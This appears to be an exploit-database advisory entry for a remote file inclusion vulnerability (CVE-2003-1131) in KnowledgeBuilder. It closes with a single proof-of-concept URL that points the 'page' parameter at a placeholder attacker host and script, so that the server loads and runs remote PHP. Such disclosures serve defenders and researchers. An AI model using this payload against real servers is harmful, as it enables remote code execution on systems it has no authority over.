KnowledgeBuilder 2.0/2.1/3.0 - Remote File Inclusion

Author: Zero X
type: webapps
platform: php
port: 
date_added: 2003-12-24 
date_updated: 2012-12-18 
verified: 1 
codes: CVE-2003-1131;OSVDB-3228 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/9292/info

KnowledgeBuilder is prone to a remote file include vulnerability. An attacker could exploit this to cause hostile PHP scripts to be included and executed from a remote server. This would occur in the security context of the web server hosting the software.

http://www.example.com/kb/index.php?page=http://[attacker's_host]/[attacker's_script]